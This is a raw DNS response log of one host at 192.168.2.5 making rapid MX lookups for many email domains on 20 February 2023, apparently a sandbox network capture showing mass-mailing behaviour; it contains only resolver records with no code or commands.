Feb 20, 2023 09:50:43.684453011 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	gmail.com			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:50:43.720084906 CET	8.8.8.8	192.168.2.5	0x6bf0	No error (0)	gmail-smtp-in.l.google.com		142.250.27.27	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:50:44.644552946 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	mail.ru			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:50:44.706617117 CET	8.8.8.8	192.168.2.5	0x9261	No error (0)	mxs.mail.ru		94.100.180.31	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:50:44.706617117 CET	8.8.8.8	192.168.2.5	0x9261	No error (0)	mxs.mail.ru		217.69.139.150	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:50:50.898061991 CET	8.8.8.8	192.168.2.5	0x11df	Server failure (2)	bog.msu.ru	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:50:54.795989990 CET	8.8.8.8	192.168.2.5	0x11df	Server failure (2)	bog.msu.ru	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:50:57.327832937 CET	8.8.8.8	192.168.2.5	0x11df	Server failure (2)	bog.msu.ru	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:00.486793995 CET	8.8.8.8	192.168.2.5	0x11df	Server failure (2)	bog.msu.ru	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:03.101499081 CET	8.8.8.8	192.168.2.5	0x11df	Server failure (2)	bog.msu.ru	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:05.693443060 CET	8.8.8.8	192.168.2.5	0x11df	Server failure (2)	bog.msu.ru	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:08.652308941 CET	8.8.8.8	192.168.2.5	0x11df	Server failure (2)	bog.msu.ru	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:11.402101040 CET	8.8.8.8	192.168.2.5	0x11df	Server failure (2)	bog.msu.ru	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:14.200344086 CET	8.8.8.8	192.168.2.5	0x11df	Server failure (2)	bog.msu.ru	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:16.751482010 CET	8.8.8.8	192.168.2.5	0x11df	Server failure (2)	bog.msu.ru	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:21.112845898 CET	8.8.8.8	192.168.2.5	0x11df	Server failure (2)	bog.msu.ru	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:23.799144983 CET	8.8.8.8	192.168.2.5	0x11df	Server failure (2)	bog.msu.ru	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:26.272521973 CET	8.8.8.8	192.168.2.5	0x11df	Server failure (2)	bog.msu.ru	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:26.493554115 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	a1plus.at			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:26.516710043 CET	8.8.8.8	192.168.2.5	0x3a1c	No error (0)	smx01.a1.net		80.75.42.227	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:51:27.067646027 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	telering.at			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:27.067646027 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	telering.at			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:27.067646027 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	telering.at			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:27.118300915 CET	8.8.8.8	192.168.2.5	0xb68a	No error (0)	mx1c50.megamailservers.eu		91.136.8.41	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:51:27.149293900 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	a1plus.at			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:27.194458961 CET	8.8.8.8	192.168.2.5	0xb992	No error (0)	smx01.a1.net		80.75.42.227	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:51:27.601598024 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	au.au-net.ne.jp	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:27.950172901 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	au.au-net.ne.jp	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:29.190428972 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	au.au-net.ne.jp	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:29.205327988 CET	8.8.8.8	192.168.2.5	0x11df	Server failure (2)	bog.msu.ru	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:29.531255007 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	au.au-net.ne.jp	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:29.601907969 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	au.au-net.ne.jp	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:30.392375946 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	au.au-net.ne.jp	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:30.689382076 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	au.au-net.ne.jp	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:31.248357058 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	au.au-net.ne.jp	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:31.937608004 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	au.au-net.ne.jp	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:32.189320087 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	au.au-net.ne.jp	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:32.407571077 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	au.au-net.ne.jp	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:32.604482889 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	au.au-net.ne.jp	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:32.751441956 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	au.au-net.ne.jp	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:32.774257898 CET	8.8.8.8	192.168.2.5	0x11df	Server failure (2)	bog.msu.ru	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:33.436464071 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	au.au-net.ne.jp	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:33.542908907 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	vub.ac.be			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:33.573378086 CET	8.8.8.8	192.168.2.5	0xa0a7	No error (0)	vub-ac-be.mail.protection.outlook.com		104.47.0.36	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:51:33.573378086 CET	8.8.8.8	192.168.2.5	0xa0a7	No error (0)	vub-ac-be.mail.protection.outlook.com		104.47.1.36	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:51:33.752309084 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	au.au-net.ne.jp	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:33.895920038 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	msn.com			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:33.926270962 CET	8.8.8.8	192.168.2.5	0xc8bc	No error (0)	msn-com.olc.protection.outlook.com		104.47.22.161	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:51:33.926270962 CET	8.8.8.8	192.168.2.5	0xc8bc	No error (0)	msn-com.olc.protection.outlook.com		104.47.18.225	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:51:33.940799952 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	au.au-net.ne.jp	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:34.009620905 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	msn.com			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:34.039194107 CET	8.8.8.8	192.168.2.5	0xcb4e	No error (0)	msn-com.olc.protection.outlook.com		104.47.56.161	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:51:34.039194107 CET	8.8.8.8	192.168.2.5	0xcb4e	No error (0)	msn-com.olc.protection.outlook.com		104.47.58.161	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:51:34.098304033 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	au.au-net.ne.jp	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:34.421770096 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	aol.com			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:34.430999041 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	au.au-net.ne.jp	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:34.444528103 CET	8.8.8.8	192.168.2.5	0x94c2	No error (0)	mx-aol.mail.gm0.yahoodns.net		67.195.228.86	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:51:34.444528103 CET	8.8.8.8	192.168.2.5	0x94c2	No error (0)	mx-aol.mail.gm0.yahoodns.net		67.195.204.80	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:51:34.444528103 CET	8.8.8.8	192.168.2.5	0x94c2	No error (0)	mx-aol.mail.gm0.yahoodns.net		67.195.204.75	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:51:34.444528103 CET	8.8.8.8	192.168.2.5	0x94c2	No error (0)	mx-aol.mail.gm0.yahoodns.net		98.136.96.93	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:51:34.444528103 CET	8.8.8.8	192.168.2.5	0x94c2	No error (0)	mx-aol.mail.gm0.yahoodns.net		67.195.228.84	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:51:34.444528103 CET	8.8.8.8	192.168.2.5	0x94c2	No error (0)	mx-aol.mail.gm0.yahoodns.net		98.136.96.92	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:51:34.484587908 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	quatro.br	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:34.547494888 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	quatro.br	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:34.603847980 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	animo.br	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:34.647463083 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	animo.br	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:34.706480980 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	au.au-net.ne.jp	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:34.709781885 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	pirajui.br	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:34.756767988 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	pirajui.br	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:34.842957973 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	quatro.br	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:34.916695118 CET	8.8.8.8	192.168.2.5	0x11df	Server failure (2)	contoso.com.br	none	none	0	3840	false
Feb 20, 2023 09:51:34.958034039 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	animo.br	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:34.972461939 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	quatro.br	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:35.023358107 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	xyz.com			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:35.023358107 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	xyz.com			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:35.023358107 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	xyz.com			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:35.023358107 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	xyz.com			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:35.023358107 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	xyz.com			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:35.054850101 CET	8.8.8.8	192.168.2.5	0xd6cc	No error (0)	aspmx.l.google.com		142.250.27.27	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:51:35.057946920 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	pirajui.br	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:35.125735044 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	animo.br	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:35.177499056 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	musical.com.br			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:35.244307041 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	xyz.com.br			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:35.244307041 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	xyz.com.br			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:35.563026905 CET	8.8.8.8	192.168.2.5	0x11df	Server failure (2)	bog.msu.ru	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:35.624593019 CET	8.8.8.8	192.168.2.5	0xaa9d	No error (0)	mx2.mailchannels.net		44.238.161.41	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:51:35.624593019 CET	8.8.8.8	192.168.2.5	0xaa9d	No error (0)	mx2.mailchannels.net		35.160.158.95	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:51:35.652158022 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	quatro.br	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:35.672445059 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	pirajui.br	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:35.679088116 CET	8.8.8.8	192.168.2.5	0x11df	Server failure (2)	contoso.com.br	none	none	0	3840	false
Feb 20, 2023 09:51:35.769258976 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	quatro.br	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:35.769681931 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	animo.br	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:35.865915060 CET	8.8.8.8	192.168.2.5	0x11df	Server failure (2)	contoso.com.pt	none	none	0	3840	false
Feb 20, 2023 09:51:35.971318007 CET	8.8.8.8	192.168.2.5	0x11df	Server failure (2)	contoso.com.br	none	none	0	3840	false
Feb 20, 2023 09:51:35.972934961 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	animo.br	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:35.975557089 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	pirajui.br	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:36.012271881 CET	8.8.8.8	192.168.2.5	0x11df	Server failure (2)	x.com.pt	none	none	0	3840	false
Feb 20, 2023 09:51:36.181929111 CET	8.8.8.8	192.168.2.5	0x11df	Server failure (2)	contoso.com.pt	none	none	0	3840	false
Feb 20, 2023 09:51:36.182419062 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	pirajui.br	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:36.182943106 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	au.au-net.ne.jp	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:36.190191984 CET	8.8.8.8	192.168.2.5	0x11df	Server failure (2)	contoso.com.pt	none	none	0	3840	false
Feb 20, 2023 09:51:36.326267004 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	musical.com.br			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:37.039299011 CET	8.8.8.8	192.168.2.5	0x11df	Server failure (2)	x.com.pt	none	none	0	3840	false
Feb 20, 2023 09:51:37.039580107 CET	8.8.8.8	192.168.2.5	0x11df	Server failure (2)	contoso.com.pt	none	none	0	3840	false
Feb 20, 2023 09:51:37.039607048 CET	8.8.8.8	192.168.2.5	0x11df	Server failure (2)	contoso.com.pt	none	none	0	3840	false
Feb 20, 2023 09:51:37.039958954 CET	8.8.8.8	192.168.2.5	0x11df	Server failure (2)	contoso.com.br	none	none	0	3840	false
Feb 20, 2023 09:51:37.166563988 CET	8.8.8.8	192.168.2.5	0x11df	Server failure (2)	kywx.com.pt	none	none	0	3840	false
Feb 20, 2023 09:51:37.179033995 CET	8.8.8.8	192.168.2.5	0x11df	Server failure (2)	contoso.com.pt	none	none	0	3840	false
Feb 20, 2023 09:51:37.276160002 CET	8.8.8.8	192.168.2.5	0x11df	Server failure (2)	x.com.pt	none	none	0	3840	false
Feb 20, 2023 09:51:37.373658895 CET	8.8.8.8	192.168.2.5	0x11df	Server failure (2)	aaw.pl	none	none	0	3840	false
Feb 20, 2023 09:51:37.383987904 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	quatro.br	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:38.608414888 CET	8.8.8.8	192.168.2.5	0x11df	Server failure (2)	contoso.com.pt	none	none	0	3840	false
Feb 20, 2023 09:51:38.765036106 CET	8.8.8.8	192.168.2.5	0x11df	Server failure (2)	contoso.com.pt	none	none	0	3840	false
Feb 20, 2023 09:51:38.965143919 CET	8.8.8.8	192.168.2.5	0x11df	Server failure (2)	contoso.com.pt	none	none	0	3840	false
Feb 20, 2023 09:51:39.075512886 CET	8.8.8.8	192.168.2.5	0x11df	Server failure (2)	x.com.pt	none	none	0	3840	false
Feb 20, 2023 09:51:39.082739115 CET	8.8.8.8	192.168.2.5	0x11df	Server failure (2)	contoso.com.br	none	none	0	3840	false
Feb 20, 2023 09:51:39.083153963 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	animo.br	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:39.087548971 CET	8.8.8.8	192.168.2.5	0x11df	Server failure (2)	griepp.pl	none	none	0	3840	false
Feb 20, 2023 09:51:39.108021975 CET	8.8.8.8	192.168.2.5	0x11df	Server failure (2)	contoso.com.pt	none	none	0	3840	false
Feb 20, 2023 09:51:39.108952999 CET	8.8.8.8	192.168.2.5	0x11df	Server failure (2)	kywx.com.pt	none	none	0	3840	false
Feb 20, 2023 09:51:39.170948982 CET	8.8.8.8	192.168.2.5	0x11df	Server failure (2)	contoso.com.pt	none	none	0	3840	false
Feb 20, 2023 09:51:39.193698883 CET	8.8.8.8	192.168.2.5	0x11df	Server failure (2)	oopp.pl	none	none	0	3840	false
Feb 20, 2023 09:51:39.228095055 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	pirajui.br	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:39.235888004 CET	8.8.8.8	192.168.2.5	0x11df	Server failure (2)	aaw.pl	none	none	0	3840	false
Feb 20, 2023 09:51:39.246822119 CET	8.8.8.8	192.168.2.5	0x11df	Server failure (2)	kywx.com.pt	none	none	0	3840	false
Feb 20, 2023 09:51:39.292736053 CET	8.8.8.8	192.168.2.5	0x11df	Server failure (2)	contoso.com.pt	none	none	0	3840	false
Feb 20, 2023 09:51:39.304635048 CET	8.8.8.8	192.168.2.5	0x11df	Server failure (2)	wewew.pl	none	none	0	3840	false
Feb 20, 2023 09:51:39.311017990 CET	8.8.8.8	192.168.2.5	0x11df	Server failure (2)	contoso.com.pt	none	none	0	3840	false
Feb 20, 2023 09:51:39.435842037 CET	8.8.8.8	192.168.2.5	0x11df	Server failure (2)	aaw.pl	none	none	0	3840	false
Feb 20, 2023 09:51:39.551841021 CET	8.8.8.8	192.168.2.5	0x11df	Server failure (2)	riekk.pl	none	none	0	3840	false
Feb 20, 2023 09:51:39.552417040 CET	8.8.8.8	192.168.2.5	0x11df	Server failure (2)	kywx.com.pt	none	none	0	3840	false
Feb 20, 2023 09:51:39.553493023 CET	8.8.8.8	192.168.2.5	0x11df	Server failure (2)	griepp.pl	none	none	0	3840	false
Feb 20, 2023 09:51:39.553520918 CET	8.8.8.8	192.168.2.5	0x11df	Server failure (2)	contoso.com.pt	none	none	0	3840	false
Feb 20, 2023 09:51:39.553788900 CET	8.8.8.8	192.168.2.5	0x11df	Server failure (2)	contoso.com.pt	none	none	0	3840	false
Feb 20, 2023 09:51:39.624908924 CET	8.8.8.8	192.168.2.5	0x11df	Server failure (2)	oopp.pl	none	none	0	3840	false
Feb 20, 2023 09:51:39.728946924 CET	8.8.8.8	192.168.2.5	0x11df	Server failure (2)	kywx.com.pt	none	none	0	3840	false
Feb 20, 2023 09:51:39.736088991 CET	8.8.8.8	192.168.2.5	0x11df	Server failure (2)	x.com.pt	none	none	0	3840	false
Feb 20, 2023 09:51:39.743849993 CET	8.8.8.8	192.168.2.5	0x11df	Server failure (2)	aaw.pl	none	none	0	3840	false
Feb 20, 2023 09:51:39.766573906 CET	8.8.8.8	192.168.2.5	0x11df	Server failure (2)	wewew.pl	none	none	0	3840	false
Feb 20, 2023 09:51:39.778254032 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	fafa.pk	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:39.874404907 CET	8.8.8.8	192.168.2.5	0x11df	Server failure (2)	aaw.pl	none	none	0	3840	false
Feb 20, 2023 09:51:39.874635935 CET	8.8.8.8	192.168.2.5	0x11df	Server failure (2)	contoso.com.pt	none	none	0	3840	false
Feb 20, 2023 09:51:39.947308064 CET	8.8.8.8	192.168.2.5	0x11df	Server failure (2)	riekk.pl	none	none	0	3840	false
Feb 20, 2023 09:51:39.947345972 CET	8.8.8.8	192.168.2.5	0x11df	Server failure (2)	griepp.pl	none	none	0	3840	false
Feb 20, 2023 09:51:39.950323105 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	musical.com.br			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:40.022170067 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	xara.pl			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:40.047897100 CET	8.8.8.8	192.168.2.5	0xf10f	No error (0)	blackhole.aftermarket.pl		185.253.212.68	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:51:40.072653055 CET	8.8.8.8	192.168.2.5	0x11df	Server failure (2)	contoso.com.pt	none	none	0	3840	false
Feb 20, 2023 09:51:40.080493927 CET	8.8.8.8	192.168.2.5	0x11df	Server failure (2)	griepp.pl	none	none	0	3840	false
Feb 20, 2023 09:51:40.111471891 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	fafa.pk	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:40.133049011 CET	8.8.8.8	192.168.2.5	0x11df	Server failure (2)	oopp.pl	none	none	0	3840	false
Feb 20, 2023 09:51:40.264983892 CET	8.8.8.8	192.168.2.5	0x11df	Server failure (2)	kywx.com.pt	none	none	0	3840	false
Feb 20, 2023 09:51:40.269588947 CET	8.8.8.8	192.168.2.5	0x11df	Server failure (2)	oopp.pl	none	none	0	3840	false
Feb 20, 2023 09:51:40.293226004 CET	8.8.8.8	192.168.2.5	0x11df	Server failure (2)	wewew.pl	none	none	0	3840	false
Feb 20, 2023 09:51:40.303227901 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	lufka.zx	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:40.411125898 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	lufka.zx	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:40.480168104 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	fanfary.pq	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:40.483222961 CET	8.8.8.8	192.168.2.5	0x11df	Server failure (2)	riekk.pl	none	none	0	3840	false
Feb 20, 2023 09:51:40.490803003 CET	8.8.8.8	192.168.2.5	0x11df	Server failure (2)	wewew.pl	none	none	0	3840	false
Feb 20, 2023 09:51:40.498895884 CET	8.8.8.8	192.168.2.5	0x11df	Server failure (2)	aaw.pl	none	none	0	3840	false
Feb 20, 2023 09:51:40.643595934 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	xxv.pq	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:40.673418045 CET	8.8.8.8	192.168.2.5	0x11df	Server failure (2)	riekk.pl	none	none	0	3840	false
Feb 20, 2023 09:51:40.674855947 CET	8.8.8.8	192.168.2.5	0x11df	Server failure (2)	griepp.pl	none	none	0	3840	false
Feb 20, 2023 09:51:40.710980892 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	fafa.pk	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:40.746378899 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	fajrant.qz	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:40.801336050 CET	8.8.8.8	192.168.2.5	0x11df	Server failure (2)	oopp.pl	none	none	0	3840	false
Feb 20, 2023 09:51:40.817665100 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	fafa.pk	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:40.851058006 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	example.com			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:40.909979105 CET	8.8.8.8	192.168.2.5	0x11df	Server failure (2)	wewew.pl	none	none	0	3840	false
Feb 20, 2023 09:51:40.942943096 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	lufka.zx	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:40.951339960 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	example.com			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:41.070905924 CET	8.8.8.8	192.168.2.5	0x11df	Server failure (2)	riekk.pl	none	none	0	3840	false
Feb 20, 2023 09:51:41.079281092 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	fanfary.pq	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:41.098146915 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	lufka.zx	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:41.216981888 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	fafa.pk	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:41.220899105 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	fanfary.pq	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:41.221335888 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	xxv.pq	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:41.266485929 CET	8.8.8.8	192.168.2.5	0x11df	Server failure (2)	contoso.com.br	none	none	0	3840	false
Feb 20, 2023 09:51:41.509635925 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	fajrant.qz	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:41.540770054 CET	8.8.8.8	192.168.2.5	0x11df	Server failure (2)	contoso.com.pt	none	none	0	3840	false
Feb 20, 2023 09:51:41.540903091 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	xxv.pq	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:41.553744078 CET	8.8.8.8	192.168.2.5	0x11df	Name error (3)	lufka.zx	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:41.554228067 CET	8.8.8.8	192.168.2.5	0x11df	No error (0)	xara.pl			MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:41.576072931 CET	8.8.8.8	192.168.2.5	0xac19	No error (0)	blackhole.aftermarket.pl		185.253.212.68	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:51:41.596318007 CET	8.8.8.8	192.168.2.5	0x11df	Server failure (2)	contoso.com.pt	none	none	0	3840	false
